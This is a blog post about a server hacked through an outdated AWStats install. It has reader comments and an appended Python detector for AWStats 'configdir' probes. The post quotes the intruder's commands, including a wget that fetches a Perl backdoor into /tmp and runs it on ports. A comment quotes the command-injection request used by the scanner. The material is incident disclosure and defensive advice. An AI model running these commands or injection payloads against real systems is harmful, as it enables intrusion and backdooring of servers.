[Update: There’s a new awstats vulnerability out there that affects the stable and development versions, through 6.4. Turn off awstats until they fix this.]
I’m not sure how bad the damage is yet. They got in yesterday through an installation of AWStats that hadn’t been upgraded. We upgraded our main installation but there was another copy that they found. We’re in pretty good company though: Russell Beattie and Jeremy Zawodny got hit with the same thing. If you are running AWStats 6.2, upgrade to 6.3 NOW.
They jumped around IPs using proxy servers, and it looks like we were scanned a few times before someone decided to exploit it. The scanner attempts to run the ‘id’ command, and if it gets output it figures it found a vulnerable server.
Once inside they created a directory in /tmp called ‘.,’ and put some privilege escalation exploits in there. Not sure what happened after that; their shell’s history file was /dev/null.
The only reason me and a couple other people noticed was because the server was super slow. I guess if script kiddies’ backdoors were better written, they’d probably be good enough coders to do something worthwhile with their adolescence.
Luckily we found it before they deleted anything, but we’re still checking stuff out and making sure we’ve eradicated them from the system. That’s pretty much all we can do in the short term, although an OS reload looks like it’s in our future.
For those that are interested I’ve put the commands they ran through AWStats in the full entry. Condolences gladly accepted, admonishments for not finding and upgrading all copies of a vulnerable program are not necessary.
[Update: it looks like they were not able to elevate to root, our kernel wasn’t vulnerable to the exploits they had on hand. We were briefly part of an IRC botnet, but judging from our bandwidth utilization at the time it doesn’t appear our server was used in any DDoS attacks.]


Here’s what they did:

id
uname 0a # Note the typo, so it wasn't automated
uname -a

bd.pl is basically a poorly written telnet server that takes the port as the argument

cd /tmp;wget example.net/bd/bd.pl # changed to protect what I assume is another hacked site
cd /tmp;perl bd.pl 123456
cd /tmp;perl bd.pl 12345
cd /tmp;perl bd.pl 1235


6 responses to “My server got 0wned”

  1. Wow, they don’t even realize that port numbers only go up to 32767?
    Anyway, I didn’t even realize awstats had a security hole in it. I’m glad I ended up nuking my (really old) install a few months ago, since all it was doing was attracting referral spammers.

  2. Woah. Thanks for the heads up. I had a couple of servers running out of date copies of awstats, and didn’t realize there was a security hole… No perl files in my /tmp so I think I was OK though. What OS is your server? Does that matter, or is this a generalized risk?

  3. It’s a fairly generalized risk; the Perl program in /tmp/ and the binaries in /tmp/.,/ were just the tools this particular script kiddie used.
    You can tell if your server has been hit by grepping all your logfiles for “configdir”. If you spot a line like this…
    10.0.73.167 - - [01/Feb/2005:19:05:17 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
    … then you probably have been scanned. If you were vulnerable then they probably knew, and you’ll want to look for other commands they ran.
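
The log check described in the third response above, written out as an added example (not code from the post or its commenters). It assumes Apache combined-format access logs; the function names, the 2xx-means-investigate rule and every sample line except the first are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache combined log: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"\S+ (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) ')
CONFIGDIR_RE = re.compile(r'(?:^|&)configdir=([^&]*)', re.I)
# Characters a directory path should not need but a shell command would.
SHELL_META = re.compile(r'[|;`$<>]')

def scan_line(line):
    """Return a finding for an awstats configdir probe, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['target'])
    param = CONFIGDIR_RE.search(url.query)
    if not url.path.lower().endswith('awstats.pl') or not param:
        return None
    payload = unquote_plus(param.group(1))   # so %7C is treated like |
    if not SHELL_META.search(payload):
        return None
    # Assumption: 2xx means awstats.pl was present and answered the request.
    hit = 200 <= int(m['status']) < 300
    return {'host': m['host'], 'time': m['time'], 'payload': payload,
            'verdict': 'investigate' if hit else 'scanned'}

def scan(lines):
    """Run scan_line over an iterable of log lines and keep the findings."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample: line 1 is the request quoted in the comment above; the
# others are made up for the example (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '10.0.73.167 - - [01/Feb/2005:19:05:17 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"',
    '192.0.2.10 - - [01/Feb/2005:19:07:02 -0500] "GET /stats/awstats.pl?configdir=%7Cecho%20;echo%20;id;echo%20;echo%7C HTTP/1.0" 200 512 "-" "-"',
    '192.0.2.20 - - [01/Feb/2005:19:09:40 -0500] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 20480 "-" "-"',
    '192.0.2.30 - - [01/Feb/2005:19:10:11 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "-"',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['verdict']:<11} {f['host']:<15} {f['time']}  {f['payload']}")
```

Only the query string of a request is recorded in the access log, so parameters sent in a POST body will not show up here and an empty result is not proof of a clean server.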
